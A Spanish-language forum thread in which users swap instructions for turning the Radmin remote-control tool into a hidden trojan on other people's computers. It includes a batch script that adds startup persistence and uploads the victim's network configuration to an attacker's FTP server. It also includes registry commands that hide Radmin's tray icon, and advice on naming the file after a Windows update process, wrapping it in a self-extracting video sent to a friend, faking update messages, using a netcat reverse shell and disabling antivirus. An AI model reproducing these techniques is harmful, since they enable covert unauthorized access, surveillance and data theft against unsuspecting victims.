Troyanizando Radmin 2.1 control remoto

Iniciado por octalh, 4 Febrero 2005, 11:59 AM

0 Miembros y 3 Visitantes están viendo este tema.

octalh

bueno el motivo por el cual le puse wuaudt.exe es porque hay un archivo en la carpeta system32 que se llama wuauclt.exe, ese se encarga de las actualizaciones automaticas del windows, lo hice para hacerlo pasar desapersibido, para un usuario comun lo mas probable es que ni fw tenga pero para alguien que ya sabe un poco mas, ya sabra para que es wuauclt.exe y si su fw de da alarma alomejor y no se fije bien en el nombre y lo deje pasar, por eso hasta le puse el icono del original, veras el metodo de la reverse shell con netcat solo era para que puedas activarlo en el momento y no tengas que esperar a que la victima reinicie, lo que tambien puedes hacer es ponerle un notificador de ip al radmin, de esa forma si la victima tiene ip dinamica estaras al tanto de su nueva ip, te pongo el codigo abajo, este codigo fue sacado del foro, pero lo modifique un poco

@echo off
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v wuauclt /t REG_SZ /d "C:\windows\system32\systrai.bat" /f
echo configuracion del sistema de la victima >C:\WINDOWS\system32\win32ip.dll
arp -a >>C:\WINDOWS\system32\win32ip.dll
ipconfig /all >>C:\WINDOWS\system32\win32ip.dll
echo usuario >C:\WINDOWS\system32\Win32el.dll
echo contraseña >>C:\WINDOWS\system32\Win32el.dll
echo put C:\WINDOWS\system32\win32ip.dll victima.txt >>C:\WINDOWS\system32\Win32el.dll
echo QUIT >>C:\WINDOWS\system32\Win32el.dll
ftp -s:C:\WINDOWS\system32\Win32el.dll servidor ftp
exit

recuerda que el bat se debe llamar systrai.bat y lo debes colocar en la carpeta system32

bueno lo quite unos cuantos comandos, porque si tu quieres le puedes poner mas par conocer mas del sistema, el motivo fue porque este bat se ejecuta todos los dias con el inicio del sistema y por supesto de forma oculta, pero mientras el bat este subiendo los datos al servidor, a la victima no se le va aparecer el escritorio, y eso le va parecer sospechoso fue por eso que le quite comandos, asi sube la info a tu servidor en unos cuanros segundos y sin problemas ni sospechas

salud2..

1000101

Hola Octalh... gracias por responder... bueno... tratare de probar ese bat... a ver como funciona... pero un consejo al momento de que cualquier antivirus, vacuna, o antispyware avise podriamos transformar el archivo exe. (troyano) en un archivo zip autoejecutable... poniendole sus mismos iconos, etc... yo le puse en selecionar comandos: "cualquier tipo de archivo", asi le mande un video chistoso a un amigo... y lo que ve el es que se descomprime y luego ve el video, mientras que se ejecutan todos los bat sin que se de cuenta... con algun mensaje para despirtar, porsupuesto, Windows Media Player: Tu archivo ha sido descargado con exito.

pero para una persona que proteja su computador a diario... el archivo que tranformemos podriamos disfrasarlo como una actualizacion del mismo Windows Media Player... asi al momento de que aviso de que aviax.exe esta intentando connectarse a internet o el mismo r_server... el mensaje dira que aviax o cualquier nombre es la actualizacion del mismo y que no se puede ver el video sin esta actualizacion... luego que acepte... le mandamos otro mensaje que diga que se actualizo... es solo una idea al momento de que funcionen todas las defensas... por que no dira que es un virus... sino que hay programas que intentan conectarse a la net...
pero igual me gustaria saber cual podria ser el bat que se pase por alto el famoso "AnitiSpyWare" pues es él quien me delató. y otra cosa muy interesante... busqué... con el programa para cambiar los iconos, ResHack... ejecute el winzip: c:\archivo de programa\winzip32 ... y encontre un icono transparente... muy util al momento de camuflar el servidor... asi... si se llegara a ver en la barra de tareas... solo se veria un espacio ;D... ok...

Y por ultimo te recuerdo octalh que solo soy un novato... y quede plop :o ;D :-X al momento de intentar ingresar mis datos en el ultimo bat que mandaste... :-X si eres tan amable de dar un ejemplo de como podria quedar con datos... aprueba de jiles que preguntan tonteras... ya? :P





saludos y gracias...!!!

octalh

mira el ultimo bat es un notificador de ip, por aquello de las ip dinamicas, lo que hace es enviarte a un servidor ftp la nueva ip de la victima, para que te puedas conectar con radmin, puedes crearte una cuenta en lycos, iespana, miarroba...etc y usar el servidor ftp que te den

salu2...

1000101

mira... si el problema no es saber la ip... por que la saco del comando netstat -na cuando estoy en msn o mandando archivos a la vistima... si el problema es que los bat te delatan... me entiendes...
dime una cosa... una vez que tengo el servidor instalado en el pc de la victima... el dll... y todo lo que instala... yo sabiendo la ip (que es dinamica)... me conecto con esa ip... y el puerto 1719 deberia funcionar...
¿que pongo aqui?

echo configuracion del sistema de la victima (en esta no entiendo)
echo usuario > ( en esta me imagino que el nick de usuario que hice)
echo contraseña >(¿es la contraseña del nick?)
ftp -s:C:\WINDOWS\system32\Win32el.dll servidor ftp (y aqui no cacho... en vez de poner servidor pongo algun numero, una direccion o que..)
exit

y con respecto a otra cosa... solo por cultura informatica... si tenemos acceso a este tipo de derechos... podemos poner que se conecte la webcam o eso es otra cosa... lei por ahi que a alguien lo detenieron por habilitar una webcam de otra persona... creo que fue en argentina... pero no me imagino como se pueda hacer eso...


saludos...!!!! ;D

kartor

hola me acabo de reguistrar y es el prmer mensaje que pongo soy nuevo en esto no se si la pregunta q les vy hacer sera muy evidente pero prfavor ayudarme les esplico le e metido a la victima el servidor recibo la sel miro la ip luego le ejecuto el servidor pero no me va asi q le desactivo el firewall de windows pero no consigo desactivar la proteccion de automatica de panda ni matar los procesos de panda me podriais decir como hacerlo? creo que todo esta bien porque lo e probado con migo y funciona gracias por adelantado  ;D

octalh

leete este post aqui se explica como desactivar el fw del sp2, solo tienes que agregarle esa opcion al bat antes de que se ejecute todo lo demas

http://foro.elhacker.net/index.php/topic,63362.0.html

Salu2

kartor

eso ya lo lei el problema que yo tengo es con el fw de panda`porque de esa manera no me deja con el panda alguin save hacer eso pero con el panda? gracias de todos modos

octalh


ilolo

Hola

si alguien me puede ayudar por favor.


soy muy novato, he echo todo paso a paso segun el manual , y elegido la opicon de ejecutable para poderselo enviar a la victima.
aun haciendo todos los pasos tal y como dice el manual no me ha funcionado.  el nc se abre y puedo ver sin problema , el pc de la victima desde  el cmd pero el radmin no funciona.

pero aun asi tengo algunas dudas que supongo que seran las que hacen que no funcione

1. agregar  ejecutable cuando dices  "elegir archivo de sistema"  hace referencia a que en el IPacker Tool  hay que elegir las pestañas "archivo" y la pestaña "sistema" la misma duda se aplicaria para el punto 4º (dll) y para el 7º (nc)

2 el el punto 4º al agregar la dll  el IPacker Tool me muestra comandos (0)  tiene que quedar asi?.

Bueno si alguien pudiese ayudarme con estas dudas. le estaria muy agradecido


gracias adelantadas


salu2 ;D

CheMo

Nas, soy nuevo en el foro, estoy intentado hacer el tutorial, pero me pierdo en lo de hacer el bat.

Meto toda la linea de codigo en el cmd pero al final no se que es realmente lo que se crea, se supone que es un archivo .bat? O es un .exe?

La linea en cuestion es esta:

Citar
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "b7060000"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaudt /t REG_SZ /d "C:\windows\system32\wuaudt.exe"

En la carpeta radmin de archivos de programa tengo puesto el fichero wuaudt.exe

a ver si me pueden ayudar plz